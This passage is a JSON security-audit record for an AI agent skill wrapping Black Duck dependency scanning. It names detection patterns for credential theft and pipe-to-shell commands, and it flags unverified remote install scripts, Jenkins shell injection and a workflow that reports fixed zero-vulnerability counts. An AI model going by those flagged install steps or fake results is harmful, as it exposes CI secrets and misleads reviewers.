behavior.","verdict":"false_positive","confidence":0.96},{"id":"blocker:references/EXAMPLE.md:438:system-reconnaissance","reason":"This reference contrasts vulnerable and remediated code for security education. The snippet is non-executable documentation and is not part of a runtime component.","verdict":"false_positive","confidence":0.96},{"id":"blocker:references/EXAMPLE.md:471:system-reconnaissance","reason":"The term appears in defensive vulnerability, incident-response, or supply chain guidance. The surrounding prose describes threats or mitigations and does not perform the flagged behavior.","verdict":"false_positive","confidence":0.96},{"id":"blocker:references/EXAMPLE.md:523:system-reconnaissance","reason":"The term appears in defensive vulnerability, incident-response, or supply chain guidance. The surrounding prose describes threats or mitigations and does not perform the flagged behavior.","verdict":"false_positive","confidence":0.96},{"id":"blocker:references/EXAMPLE.md:529:system-reconnaissance","reason":"The term appears in defensive vulnerability, incident-response, or supply chain guidance. The surrounding prose describes threats or mitigations and does not perform the flagged behavior.","verdict":"false_positive","confidence":0.96},{"id":"blocker:references/EXAMPLE.md:381:network-reconnaissance","reason":"The term appears in defensive vulnerability, incident-response, or supply chain guidance. The surrounding prose describes threats or mitigations and does not perform the flagged behavior.","verdict":"false_positive","confidence":0.96},{"id":"network:references/license_risk_guide.md:361:hardcoded-url","reason":"The URL or library name appears in defensive reference material as documentation, configuration guidance, or an illustrative example. No request is made by this Markdown file.","verdict":"false_positive","confidence":0.96},{"id":"blocker:references/license_risk_guide.md:237:system-reconnaissance","reason":"The term appears in defensive vulnerability, incident-response, or supply chain guidance. The surrounding prose describes threats or mitigations and does not perform the flagged behavior.","verdict":"false_positive","confidence":0.96},{"id":"blocker:references/license_risk_guide.md:280:system-reconnaissance","reason":"The term appears in defensive vulnerability, incident-response, or supply chain guidance. The surrounding prose describes threats or mitigations and does not perform the flagged behavior.","verdict":"false_positive","confidence":0.96},{"id":"scripts:references/remediation_strategies.md:249:dynamic-code-evaluation-with-eval","reason":"The eval call is a labeled vulnerable before-example followed by validation and a safer alternative. It is documentation, not executable skill logic.","verdict":"false_positive","confidence":0.96},{"id":"network:references/remediation_strategies.md:209:http-client-library","reason":"The URL or library name appears in defensive reference material as documentation, configuration guidance, or an illustrative example. No request is made by this Markdown file.","verdict":"false_positive","confidence":0.96},{"id":"network:references/remediation_strategies.md:301:hardcoded-url","reason":"The URL or library name appears in defensive reference material as documentation, configuration guidance, or an illustrative example. No request is made by this Markdown file.","verdict":"false_positive","confidence":0.96},{"id":"network:references/remediation_strategies.md:302:hardcoded-url","reason":"The URL or library name appears in defensive reference material as documentation, configuration guidance, or an illustrative example. No request is made by this Markdown file.","verdict":"false_positive","confidence":0.96},{"id":"blocker:references/remediation_strategies.md:254:system-reconnaissance","reason":"The eval call is a labeled vulnerable before-example followed by validation and a safer alternative. It is documentation, not executable skill logic.","verdict":"false_positive","confidence":0.96},{"id":"blocker:references/remediation_strategies.md:263:network-reconnaissance","reason":"The term appears in defensive vulnerability, incident-response, or supply chain guidance. The surrounding prose describes threats or mitigations and does not perform the flagged behavior.","verdict":"false_positive","confidence":0.96},{"id":"scripts:references/supply_chain_threats.md:200:python-exec-function","reason":"This is explicitly labeled example malicious code in defensive supply chain documentation. The Markdown file does not execute the example or direct an agent to deploy it.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:references/supply_chain_threats.md:199:node-js-child-process-module","reason":"This is explicitly labeled example malicious code in defensive supply chain documentation. The Markdown file does not execute the example or direct an agent to deploy it.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:references/supply_chain_threats.md:204:node-js-child-process-module","reason":"This is explicitly labeled example malicious code in defensive supply chain documentation. The Markdown file does not execute the example or direct an agent to deploy it.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:references/supply_chain_threats.md:205:process-spawn","reason":"This is explicitly labeled example malicious code in defensive supply chain documentation. The Markdown file does not execute the example or direct an agent to deploy it.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:references/supply_chain_threats.md:200:process-exec","reason":"This is explicitly labeled example malicious code in defensive supply chain documentation. The Markdown file does not execute the example or direct an agent to deploy it.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:references/supply_chain_threats.md:532:shell-command-substitution","reason":"The pattern appears inside a non-executable defensive example that explains detection or remediation. It does not access this environment, file system, or process runtime.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:references/supply_chain_threats.md:205:unix-shell-invocation","reason":"This is explicitly labeled example malicious code in defensive supply chain documentation. The Markdown file does not execute the example or direct an agent to deploy it.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:references/supply_chain_threats.md:286:unix-shell-invocation","reason":"The pattern appears inside a non-executable defensive example that explains detection or remediation. It does not access this environment, file system, or process runtime.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:references/supply_chain_threats.md:335:unix-shell-invocation","reason":"The pattern appears inside a non-executable defensive example that explains detection or remediation. It does not access this environment, file system, or process runtime.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:references/supply_chain_threats.md:513:unix-shell-invocation","reason":"The pattern appears inside a non-executable defensive example that explains detection or remediation. It does not access this environment, file system, or process runtime.","verdict":"false_positive","confidence":0.96},{"id":"network:references/supply_chain_threats.md:193:fetch-api-call","reason":"This is explicitly labeled example malicious code in defensive supply chain documentation. The Markdown file does not execute the example or direct an agent to deploy it.","verdict":"false_positive","confidence":0.96},{"id":"network:references/supply_chain_threats.md:62:hardcoded-url","reason":"The URL or library name appears in defensive reference material as documentation, configuration guidance, or an illustrative example. No request is made by this Markdown file.","verdict":"false_positive","confidence":0.96},{"id":"network:references/supply_chain_threats.md:65:hardcoded-url","reason":"The URL or library name appears in defensive reference material as documentation, configuration guidance, or an illustrative example. No request is made by this Markdown file.","verdict":"false_positive","confidence":0.96},{"id":"network:references/supply_chain_threats.md:66:hardcoded-url","reason":"The URL or library name appears in defensive reference material as documentation, configuration guidance, or an illustrative example. No request is made by this Markdown file.","verdict":"false_positive","confidence":0.96},{"id":"network:references/supply_chain_threats.md:69:hardcoded-url","reason":"The URL or library name appears in defensive reference material as documentation, configuration guidance, or an illustrative example. No request is made by this Markdown file.","verdict":"false_positive","confidence":0.96},{"id":"network:references/supply_chain_threats.md:75:hardcoded-url","reason":"The URL or library name appears in defensive reference material as documentation, configuration guidance, or an illustrative example. No request is made by this Markdown file.","verdict":"false_positive","confidence":0.96},{"id":"network:references/supply_chain_threats.md:193:hardcoded-url","reason":"This is explicitly labeled example malicious code in defensive supply chain documentation. The Markdown file does not execute the example or direct an agent to deploy it.","verdict":"false_positive","confidence":0.96},{"id":"network:references/supply_chain_threats.md:200:hardcoded-url","reason":"This is explicitly labeled example malicious code in defensive supply chain documentation. The Markdown file does not execute the example or direct an agent to deploy it.","verdict":"false_positive","confidence":0.96},{"id":"network:references/supply_chain_threats.md:388:hardcoded-url","reason":"The URL or library name appears in defensive reference material as documentation, configuration guidance, or an illustrative example. No request is made by this Markdown file.","verdict":"false_positive","confidence":0.96},{"id":"network:references/supply_chain_threats.md:412:hardcoded-url","reason":"The URL or library name appears in defensive reference material as documentation, configuration guidance, or an illustrative example. No request is made by this Markdown file.","verdict":"false_positive","confidence":0.96},{"id":"network:references/supply_chain_threats.md:413:hardcoded-url","reason":"The URL or library name appears in defensive reference material as documentation, configuration guidance, or an illustrative example. No request is made by this Markdown file.","verdict":"false_positive","confidence":0.96},{"id":"network:references/supply_chain_threats.md:518:hardcoded-url","reason":"The URL or library name appears in defensive reference material as documentation, configuration guidance, or an illustrative example. No request is made by this Markdown file.","verdict":"false_positive","confidence":0.96},{"id":"env_access:references/supply_chain_threats.md:189:environment-variable-access-dot-notation","reason":"This is explicitly labeled example malicious code in defensive supply chain documentation. The Markdown file does not execute the example or direct an agent to deploy it.","verdict":"false_positive","confidence":0.96},{"id":"env_access:references/supply_chain_threats.md:190:environment-variable-access-dot-notation","reason":"This is explicitly labeled example malicious code in defensive supply chain documentation. The Markdown file does not execute the example or direct an agent to deploy it.","verdict":"false_positive","confidence":0.96},{"id":"env_access:references/supply_chain_threats.md:191:environment-variable-access-dot-notation","reason":"This is explicitly labeled example malicious code in defensive supply chain documentation. The Markdown file does not execute the example or direct an agent to deploy it.","verdict":"false_positive","confidence":0.96},{"id":"env_access:references/supply_chain_threats.md:189:environment-variable-object","reason":"This is explicitly labeled example malicious code in defensive supply chain documentation. The Markdown file does not execute the example or direct an agent to deploy it.","verdict":"false_positive","confidence":0.96},{"id":"env_access:references/supply_chain_threats.md:190:environment-variable-object","reason":"This is explicitly labeled example malicious code in defensive supply chain documentation. The Markdown file does not execute the example or direct an agent to deploy it.","verdict":"false_positive","confidence":0.96},{"id":"env_access:references/supply_chain_threats.md:191:environment-variable-object","reason":"This is explicitly labeled example malicious code in defensive supply chain documentation. The Markdown file does not execute the example or direct an agent to deploy it.","verdict":"false_positive","confidence":0.96},{"id":"env_access:references/supply_chain_threats.md:190:aws-credential-environment-variables","reason":"This is explicitly labeled example malicious code in defensive supply chain documentation. The Markdown file does not execute the example or direct an agent to deploy it.","verdict":"false_positive","confidence":0.96},{"id":"env_access:references/supply_chain_threats.md:191:git-platform-tokens","reason":"This is explicitly labeled example malicious code in defensive supply chain documentation. The Markdown file does not execute the example or direct an agent to deploy it.","verdict":"false_positive","confidence":0.96},{"id":"sensitive:references/supply_chain_threats.md:189:environment-file-access","reason":"This is explicitly labeled example malicious code in defensive supply chain documentation. The Markdown file does not execute the example or direct an agent to deploy it.","verdict":"false_positive","confidence":0.96},{"id":"sensitive:references/supply_chain_threats.md:190:environment-file-access","reason":"This is explicitly labeled example malicious code in defensive supply chain documentation. The Markdown file does not execute the example or direct an agent to deploy it.","verdict":"false_positive","confidence":0.96},{"id":"sensitive:references/supply_chain_threats.md:191:environment-file-access","reason":"This is explicitly labeled example malicious code in defensive supply chain documentation. The Markdown file does not execute the example or direct an agent to deploy it.","verdict":"false_positive","confidence":0.96},{"id":"sensitive:references/supply_chain_threats.md:64:npm-config-file-may-contain-tokens","reason":"The pattern appears inside a non-executable defensive example that explains detection or remediation. It does not access this environment, file system, or process runtime.","verdict":"false_positive","confidence":0.96},{"id":"sensitive:references/supply_chain_threats.md:411:npm-config-file-may-contain-tokens","reason":"The pattern appears inside a non-executable defensive example that explains detection or remediation. It does not access this environment, file system, or process runtime.","verdict":"false_positive","confidence":0.96},{"id":"blocker:references/supply_chain_threats.md:20:malware-type-keywords","reason":"The term appears in defensive vulnerability, incident-response, or supply chain guidance. The surrounding prose describes threats or mitigations and does not perform the flagged behavior.","verdict":"false_positive","confidence":0.96},{"id":"blocker:references/supply_chain_threats.md:181:malware-type-keywords","reason":"The term appears in defensive vulnerability, incident-response, or supply chain guidance. The surrounding prose describes threats or mitigations and does not perform the flagged behavior.","verdict":"false_positive","confidence":0.96},{"id":"blocker:references/supply_chain_threats.md:202:malware-type-keywords","reason":"This is explicitly labeled example malicious code in defensive supply chain documentation. The Markdown file does not execute the example or direct an agent to deploy it.","verdict":"false_positive","confidence":0.96},{"id":"blocker:references/supply_chain_threats.md:235:malware-type-keywords","reason":"The term appears in defensive vulnerability, incident-response, or supply chain guidance. The surrounding prose describes threats or mitigations and does not perform the flagged behavior.","verdict":"false_positive","confidence":0.96},{"id":"blocker:references/supply_chain_threats.md:200:pipe-to-shell-pattern","reason":"This is explicitly labeled example malicious code in defensive supply chain documentation. The Markdown file does not execute the example or direct an agent to deploy it.","verdict":"false_positive","confidence":0.96},{"id":"blocker:references/supply_chain_threats.md:254:system-reconnaissance","reason":"The term appears in defensive vulnerability, incident-response, or supply chain guidance. The surrounding prose describes threats or mitigations and does not perform the flagged behavior.","verdict":"false_positive","confidence":0.96},{"id":"blocker:references/supply_chain_threats.md:555:system-reconnaissance","reason":"The term appears in defensive vulnerability, incident-response, or supply chain guidance. The surrounding prose describes threats or mitigations and does not perform the flagged behavior.","verdict":"false_positive","confidence":0.96},{"id":"blocker:references/supply_chain_threats.md:281:network-reconnaissance","reason":"The term appears in defensive vulnerability, incident-response, or supply chain guidance. The surrounding prose describes threats or mitigations and does not perform the flagged behavior.","verdict":"false_positive","confidence":0.96},{"id":"blocker:references/supply_chain_threats.md:69:non-standard-pypi-index","reason":"The term appears in defensive vulnerability, incident-response, or supply chain guidance. The surrounding prose describes threats or mitigations and does not perform the flagged behavior.","verdict":"false_positive","confidence":0.96},{"id":"blocker:references/WORKFLOW_CHECKLIST.md:193:malware-type-keywords","reason":"The term appears in defensive vulnerability, incident-response, or supply chain guidance. The surrounding prose describes threats or mitigations and does not perform the flagged behavior.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:SKILL.md:40:ruby-shell-backtick-execution","reason":"The detected backticks are Markdown fences or inline code formatting in instructional text, not Ruby or shell execution. Executable remote-download commands are adjudicated separately.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:SKILL.md:47:ruby-shell-backtick-execution","reason":"The detected backticks are Markdown fences or inline code formatting in instructional text, not Ruby or shell execution. Executable remote-download commands are adjudicated separately.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:SKILL.md:51:ruby-shell-backtick-execution","reason":"The detected backticks are Markdown fences or inline code formatting in instructional text, not Ruby or shell execution. Executable remote-download commands are adjudicated separately.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:SKILL.md:57:ruby-shell-backtick-execution","reason":"The detected backticks are Markdown fences or inline code formatting in instructional text, not Ruby or shell execution. Executable remote-download commands are adjudicated separately.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:SKILL.md:65:ruby-shell-backtick-execution","reason":"The detected backticks are Markdown fences or inline code formatting in instructional text, not Ruby or shell execution. Executable remote-download commands are adjudicated separately.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:SKILL.md:79:ruby-shell-backtick-execution","reason":"The detected backticks are Markdown fences or inline code formatting in instructional text, not Ruby or shell execution. Executable remote-download commands are adjudicated separately.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:SKILL.md:97:ruby-shell-backtick-execution","reason":"The detected backticks are Markdown fences or inline code formatting in instructional text, not Ruby or shell execution. Executable remote-download commands are adjudicated separately.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:SKILL.md:151:ruby-shell-backtick-execution","reason":"The detected backticks are Markdown fences or inline code formatting in instructional text, not Ruby or shell execution. Executable remote-download commands are adjudicated separately.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:SKILL.md:152:ruby-shell-backtick-execution","reason":"The detected backticks are Markdown fences or inline code formatting in instructional text, not Ruby or shell execution. Executable remote-download commands are adjudicated separately.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:SKILL.md:153:ruby-shell-backtick-execution","reason":"The detected backticks are Markdown fences or inline code formatting in instructional text, not Ruby or shell execution. Executable remote-download commands are adjudicated separately.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:SKILL.md:154:ruby-shell-backtick-execution","reason":"The detected backticks are Markdown fences or inline code formatting in instructional text, not Ruby or shell execution. Executable remote-download commands are adjudicated separately.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:SKILL.md:158:ruby-shell-backtick-execution","reason":"The detected backticks are Markdown fences or inline code formatting in instructional text, not Ruby or shell execution. Executable remote-download commands are adjudicated separately.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:SKILL.md:159:ruby-shell-backtick-execution","reason":"The detected backticks are Markdown fences or inline code formatting in instructional text, not Ruby or shell execution. Executable remote-download commands are adjudicated separately.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:SKILL.md:160:ruby-shell-backtick-execution","reason":"The detected backticks are Markdown fences or inline code formatting in instructional text, not Ruby or shell execution. Executable remote-download commands are adjudicated separately.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:SKILL.md:161:ruby-shell-backtick-execution","reason":"The detected backticks are Markdown fences or inline code formatting in instructional text, not Ruby or shell execution. Executable remote-download commands are adjudicated separately.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:SKILL.md:165:ruby-shell-backtick-execution","reason":"The detected backticks are Markdown fences or inline code formatting in instructional text, not Ruby or shell execution. Executable remote-download commands are adjudicated separately.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:SKILL.md:166:ruby-shell-backtick-execution","reason":"The detected backticks are Markdown fences or inline code formatting in instructional text, not Ruby or shell execution. Executable remote-download commands are adjudicated separately.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:SKILL.md:167:ruby-shell-backtick-execution","reason":"The detected backticks are Markdown fences or inline code formatting in instructional text, not Ruby or shell execution. Executable remote-download commands are adjudicated separately.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:SKILL.md:168:ruby-shell-backtick-execution","reason":"The detected backticks are Markdown fences or inline code formatting in instructional text, not Ruby or shell execution. Executable remote-download commands are adjudicated separately.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:SKILL.md:169:ruby-shell-backtick-execution","reason":"The detected backticks are Markdown fences or inline code formatting in instructional text, not Ruby or shell execution. Executable remote-download commands are adjudicated separately.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:SKILL.md:175:ruby-shell-backtick-execution","reason":"The detected backticks are Markdown fences or inline code formatting in instructional text, not Ruby or shell execution. Executable remote-download commands are adjudicated separately.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:SKILL.md:183:ruby-shell-backtick-execution","reason":"The detected backticks are Markdown fences or inline code formatting in instructional text, not Ruby or shell execution. Executable remote-download commands are adjudicated separately.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:SKILL.md:187:ruby-shell-backtick-execution","reason":"The detected backticks are Markdown fences or inline code formatting in instructional text, not Ruby or shell execution. Executable remote-download commands are adjudicated separately.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:SKILL.md:194:ruby-shell-backtick-execution","reason":"The detected backticks are Markdown fences or inline code formatting in instructional text, not Ruby or shell execution. Executable remote-download commands are adjudicated separately.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:SKILL.md:198:ruby-shell-backtick-execution","reason":"The detected backticks are Markdown fences or inline code formatting in instructional text, not Ruby or shell execution. Executable remote-download commands are adjudicated separately.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:SKILL.md:205:ruby-shell-backtick-execution","reason":"The detected backticks are Markdown fences or inline code formatting in instructional text, not Ruby or shell execution. Executable remote-download commands are adjudicated separately.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:SKILL.md:209:ruby-shell-backtick-execution","reason":"The detected backticks are Markdown fences or inline code formatting in instructional text, not Ruby or shell execution. Executable remote-download commands are adjudicated separately.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:SKILL.md:216:ruby-shell-backtick-execution","reason":"The detected backticks are Markdown fences or inline code formatting in instructional text, not Ruby or shell execution. Executable remote-download commands are adjudicated separately.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:SKILL.md:220:ruby-shell-backtick-execution","reason":"The detected backticks are Markdown fences or inline code formatting in instructional text, not Ruby or shell execution. Executable remote-download commands are adjudicated separately.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:SKILL.md:227:ruby-shell-backtick-execution","reason":"The detected backticks are Markdown fences or inline code formatting in instructional text, not Ruby or shell execution. Executable remote-download commands are adjudicated separately.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:SKILL.md:233:ruby-shell-backtick-execution","reason":"The detected backticks are Markdown fences or inline code formatting in instructional text, not Ruby or shell execution. Executable remote-download commands are adjudicated separately.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:SKILL.md:238:ruby-shell-backtick-execution","reason":"The detected backticks are Markdown fences or inline code formatting in instructional text, not Ruby or shell execution. Executable remote-download commands are adjudicated separately.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:SKILL.md:271:ruby-shell-backtick-execution","reason":"The detected backticks are Markdown fences or inline code formatting in instructional text, not Ruby or shell execution. Executable remote-download commands are adjudicated separately.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:SKILL.md:278:ruby-shell-backtick-execution","reason":"The detected backticks are Markdown fences or inline code formatting in instructional text, not Ruby or shell execution. Executable remote-download commands are adjudicated separately.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:SKILL.md:285:ruby-shell-backtick-execution","reason":"The detected backticks are Markdown fences or inline code formatting in instructional text, not Ruby or shell execution. Executable remote-download commands are adjudicated separately.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:SKILL.md:291:ruby-shell-backtick-execution","reason":"The detected backticks are Markdown fences or inline code formatting in instructional text, not Ruby or shell execution. Executable remote-download commands are adjudicated separately.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:SKILL.md:302:ruby-shell-backtick-execution","reason":"The detected backticks are Markdown fences or inline code formatting in instructional text, not Ruby or shell execution. Executable remote-download commands are adjudicated separately.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:SKILL.md:318:ruby-shell-backtick-execution","reason":"The detected backticks are Markdown fences or inline code formatting in instructional text, not Ruby or shell execution. Executable remote-download commands are adjudicated separately.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:SKILL.md:328:ruby-shell-backtick-execution","reason":"The detected backticks are Markdown fences or inline code formatting in instructional text, not Ruby or shell execution. Executable remote-download commands are adjudicated separately.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:SKILL.md:334:ruby-shell-backtick-execution","reason":"The detected backticks are Markdown fences or inline code formatting in instructional text, not Ruby or shell execution. Executable remote-download commands are adjudicated separately.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:SKILL.md:342:ruby-shell-backtick-execution","reason":"The detected backticks are Markdown fences or inline code formatting in instructional text, not Ruby or shell execution. Executable remote-download commands are adjudicated separately.","verdict":"false_positive","confidence":0.96},{"id":"network:SKILL.md:21:hardcoded-url","reason":"The URL is a documentation or configuration reference and is not fetched or executed by this file. No credential or sensitive data is transmitted.","verdict":"false_positive","confidence":0.96},{"id":"network:SKILL.md:22:hardcoded-url","reason":"The URL is a documentation or configuration reference and is not fetched or executed by this file. No credential or sensitive data is transmitted.","verdict":"false_positive","confidence":0.96},{"id":"network:SKILL.md:23:hardcoded-url","reason":"The URL is a documentation or configuration reference and is not fetched or executed by this file. No credential or sensitive data is transmitted.","verdict":"false_positive","confidence":0.96},{"id":"network:SKILL.md:24:hardcoded-url","reason":"The URL is a documentation or configuration reference and is not fetched or executed by this file. No credential or sensitive data is transmitted.","verdict":"false_positive","confidence":0.96},{"id":"network:SKILL.md:42:hardcoded-url","reason":"This URL supplies a script that is executed immediately without version pinning or integrity verification. A compromised response would execute with CI or user privileges.","verdict":"confirmed","severity":"high","confidence":0.98},{"id":"network:SKILL.md:53:hardcoded-url","reason":"This URL supplies a script that is executed immediately without version pinning or integrity verification. A compromised response would execute with CI or user privileges.","verdict":"confirmed","severity":"high","confidence":0.98},{"id":"network:SKILL.md:189:hardcoded-url","reason":"This URL supplies a script that is executed immediately without version pinning or integrity verification. A compromised response would execute with CI or user privileges.","verdict":"confirmed","severity":"high","confidence":0.98},{"id":"network:SKILL.md:280:hardcoded-url","reason":"This URL supplies a script that is executed immediately without version pinning or integrity verification. A compromised response would execute with CI or user privileges.","verdict":"confirmed","severity":"high","confidence":0.98},{"id":"network:SKILL.md:293:hardcoded-url","reason":"This URL supplies a script that is executed immediately without version pinning or integrity verification. A compromised response would execute with CI or user privileges.","verdict":"confirmed","severity":"high","confidence":0.98},{"id":"network:SKILL.md:299:hardcoded-url","reason":"This URL supplies a script that is executed immediately without version pinning or integrity verification. A compromised response would execute with CI or user privileges.","verdict":"confirmed","severity":"high","confidence":0.98},{"id":"network:SKILL.md:385:hardcoded-url","reason":"The URL is a documentation or configuration reference and is not fetched or executed by this file. No credential or sensitive data is transmitted.","verdict":"false_positive","confidence":0.96},{"id":"network:SKILL.md:386:hardcoded-url","reason":"The URL is a documentation or configuration reference and is not fetched or executed by this file. No credential or sensitive data is transmitted.","verdict":"false_positive","confidence":0.96},{"id":"network:SKILL.md:387:hardcoded-url","reason":"The URL is a documentation or configuration reference and is not fetched or executed by this file. No credential or sensitive data is transmitted.","verdict":"false_positive","confidence":0.96},{"id":"network:SKILL.md:388:hardcoded-url","reason":"The URL is a documentation or configuration reference and is not fetched or executed by this file. No credential or sensitive data is transmitted.","verdict":"false_positive","confidence":0.96},{"id":"network:SKILL.md:389:hardcoded-url","reason":"The URL is a documentation or configuration reference and is not fetched or executed by this file. No credential or sensitive data is transmitted.","verdict":"false_positive","confidence":0.96},{"id":"network:SKILL.md:390:hardcoded-url","reason":"The URL is a documentation or configuration reference and is not fetched or executed by this file. No credential or sensitive data is transmitted.","verdict":"false_positive","confidence":0.96},{"id":"network:SKILL.md:391:hardcoded-url","reason":"The URL is a documentation or configuration reference and is not fetched or executed by this file. No credential or sensitive data is transmitted.","verdict":"false_positive","confidence":0.96},{"id":"blocker:SKILL.md:357:malware-type-keywords","reason":"The matched term is descriptive security language or a defensive example. No evidence shows malicious execution, reconnaissance, or exploitation intent.","verdict":"false_positive","confidence":0.96},{"id":"blocker:SKILL.md:336:system-reconnaissance","reason":"The matched term is descriptive security language or a defensive example. No evidence shows malicious execution, reconnaissance, or exploitation intent.","verdict":"false_positive","confidence":0.96},{"id":"blocker:SKILL.md:369:system-reconnaissance","reason":"The matched term is descriptive security language or a defensive example. No evidence shows malicious execution, reconnaissance, or exploitation intent.","verdict":"false_positive","confidence":0.96}],"semantic_findings":[{"title":"Misleading fixed security results","severity":"high","locations":[{"file":"assets/ci_integration/github_actions.yml","line_end":125,"line_start":113}],"confidence":0.99,"description":"The GitHub workflow posts zero vulnerability counts and no license violations without parsing results, which can mislead reviewers.","confidence_reasoning":"The comment body contains fixed zero counts and an unconditional no-violations statement. Nearby comments acknowledge that actual results are not parsed."},{"title":"Jenkins shell injection and secret exposure","severity":"high","locations":[{"file":"assets/ci_integration/jenkins_pipeline.groovy","line_end":34,"line_start":32},{"file":"assets/ci_integration/jenkins_pipeline.groovy","line_end":99,"line_start":89},{"file":"assets/ci_integration/jenkins_pipeline.groovy","line_end":151,"line_start":142}],"confidence":0.92,"description":"Groovy interpolates branch-derived values and Black Duck credentials into shell strings before execution, enabling command injection and exposing secrets in process arguments.","confidence_reasoning":"The double-quoted Groovy strings interpolate BRANCH_NAME-derived project data and BLACKDUCK_TOKEN into commands later passed to sh. No argument-safe execution boundary is used."},{"title":"Mutable GitHub Action references","severity":"medium","locations":[{"file":"assets/ci_integration/github_actions.yml","line_end":31,"line_start":31},{"file":"assets/ci_integration/github_actions.yml","line_end":39,"line_start":39},{"file":"assets/ci_integration/github_actions.yml","line_end":57,"line_start":57},{"file":"assets/ci_integration/github_actions.yml","line_end":81,"line_start":81},{"file":"assets/ci_integration/github_actions.yml","line_end":101,"line_start":101},{"file":"assets/ci_integration/github_actions.yml","line_end":143,"line_start":143},{"file":"assets/ci_integration/github_actions.yml","line_end":148,"line_start":148}],"confidence":0.97,"description":"GitHub Actions use mutable major-version tags, allowing upstream changes to execute with repository and token permissions.","confidence_reasoning":"Each uses statement ends in a mutable tag such as v1, v3, v4, or v7 rather than an immutable commit SHA."}],"subject_marketplace_commit_sha":"181fdefcafd96b041926e61c4b2e306ca7e7820e","subject_content_hash":"423c6c504e7d1c7d813281bb58789e3d49dd1fec85872296c662788dbe6e3eff","subject_tree_hash":"d6648b9cea79c8f6fc9ee23a78245125d79136ac68bdd03a3e9e949678dab163","subject_plugin_path":"skills/agentsecops/sca-blackduck","audit_payload_hash":"ec2469ba3eaf655f4b0b8834582136d8","confirmed_risk_level":"critical","scanner_version":"3.0.0","policy_version":"skillstore-security-audit-policy-v1","subject":{"marketplaceCommitSha":"181fdefcafd96b041926e61c4b2e306ca7e7820e","contentHash":"423c6c504e7d1c7d813281bb58789e3d49dd1fec85872296c662788dbe6e3eff","treeHash":"d6648b9cea79c8f6fc9ee23a78245125d79136ac68bdd03a3e9e949678dab163","pluginPath":"skills/agentsecops/sca-blackduck","auditPayloadHash":"ec2469ba3eaf655f4b0b8834582136d8"},"scannerVersion":"3.0.0","policyVersion":"skillstore-security-audit-policy-v1"},"auditTranslation":null,"localization":{"requestedLocale":"en","contentLocale":"en","availableLocales":["en"],"fallbackToEnglish":false},"attestation":{"availability":"issued","url":"/api/skills/agentsecops-sca-blackduck/audits/9/attestation","status":"active"},"trust":{"publicState":"public","auditState":"complete","auditCurrentness":null,"confirmedRiskLevel":"critical","confirmedFindingCount":5,"capabilityReviewCount":13,"needsReviewCount":0,"falsePositiveCount":0,"agentAutoInstallPolicy":"blocked","manualInstallPolicy":"allowed_with_warning","artifactSignatureState":"available","attestationState":"active","verificationState":"not_verified"},"isLatest":true}}